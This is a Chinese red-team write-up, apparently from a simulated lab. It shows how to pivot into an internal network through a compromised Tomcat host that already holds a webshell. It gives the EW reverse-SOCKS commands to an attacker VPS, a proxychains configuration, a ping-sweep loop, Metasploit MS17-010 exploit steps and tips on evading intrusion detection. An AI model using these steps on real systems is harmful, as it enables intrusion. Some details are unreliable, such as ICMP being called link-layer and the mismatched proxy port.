EW入侵内网渗透记录

gclome

原文链接：EW入侵内网渗透记录

一、前言
最近一周护网进行了内网渗透，这里做个人小结，也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。

​


二、本文介绍

1.准备工作
2.EW是什么，可以做什么。
3.内网模拟(基础环境及网络拓扑)
4.EW代理实战
6.利用proxychains代理寻找MS17-010。
三、准备工作
1.模拟环境需要natapp.cn这类NAT穿透工具注册账号购买免费web映射套餐
2.EW内网穿透工具，https://github.com/idlefire/ew
3.一台Ubuntu VPS,端口开放10000-65535
4.若干台WINDOWS虚拟机在NAT网络下运行。
四、EW简介
EW是一款四年前开发好的NAT穿透工具，具有 SOCKS v5服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透代理服务，能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道，帮助内网渗透直达网络深处。工具包中提供了多种可执行文件，以适用不同的操作系统，Linux、Windows、MacOS、Arm-Linux 均被包括其内。

EW共有 6 种命令格式（ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 ）。其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供，分别对应正向与反向socks代理，其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。这里篇幅有限，仅介绍危害最大的rssocks。
同类工具还有socat，就实战来看，EW操作较简单，SOCAT有时会发生段错误，而EW则比较稳定。

防守方如需查杀规则查看 https://github.com/rootkiter/Binary-files 项目。
五、内网模拟
Kali Linux（Attacker 内网 172.16.33.129）
Ubuntu 16.04.3（Attacker 公网 120.53.123.X）
Windows 7（肉鸡 WEB服务器 172.2.40.129）
Windows 7 SP1（肉鸡内网其他机器 172.2.40.X）
网络拓扑：Kali Linux是攻击者，Ubuntu是公网上的一台VPS，Windows 7是目标机器无外网IP8080端口通过NAT穿透工具映射到外网提供WEB服务。

​



六、EW代理实战
数据流向:  黑客KALI SOCKS v5 <-> VPS 10801 <-> VPS 10241 <-> 肉鸡 rssocks
操作在 公网IP主机 和 WEB肉机上进行目的是通过反弹方式创建socks代理。
第一步，在VPS上将Github下回的 EW 项目解压并执行：
./ew_for_linux64 -s rcsocks -l 10801 -e 10241   
这句话的意思是，在 120.53.123.X  VPS主机添加转换隧道，其中10801端口供黑客使用，10241 端口供肉鸡通道连接，黑客连接10801，本质是反连VPS的10241端口。

​


第二步，在WEB主机（172.2.40.129）上执行：
ew_for_Win.exe -s rssocks -d 120.53.123.X -e 10241
这句话的意思是，在WEB肉鸡上开启socks5代理服务，具体端口依据VPS端设定，这里的10241仅与VPS通信使用。上传ew到选定的目录。

​


肉鸡网络环境

​

肉鸡内网其他机器
​


工具使用第三步，在KALI上：vim /etc/proxychains.conf
socks5  120.53.123.X 10241

​


这里用SOCKS5，因为是WIN的主机，还有一个选择--弹到CS，CS代理为SOCKS4。
注意验证SOCKS是否打通
proxychains nmap -sT hosts -p port

​


七、内网探测
proxy nmap targetIP
慎用扫描，流量动静大、速度慢、不稳定、时间长、容易断 。
NetBIOS、ICMP均可以探测存活主机前者仅探测WIN后者遇到禁ping摸瞎。
还有ARP探测特征比较明显。三者权衡，因此进入陌生环境，首选ICMP。
如果是Linux用bash脚本，如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。

cmd命令可保存成bat后执行：for /l %%p in (1,1,254) do ping 172.2.40.%%p -n 1 -w 5 |find "TTL" >./ipcheck.log
也可先执行，arp -a看缓存结果。
注意Socks协议只能下到网络层，ICMP属于链路层无法代理。
因此proxychains ping命令不能正常工作。

​


验证内网WIN主机是否开启防火墙，

​


八、MSF漏洞验证
proxychains msfconsole
search 17_010
use 1
set rhost 172.2.40.128
exploit

​

九、总结
内网中有许多监控设备，有HIDS和NIDS, 其中规避HIDS需对工具免杀，规避NIDS需慎用扫描，避免踩雷。学习上，搭靶场多积累经验，了解安全设备检测原理避免被针对。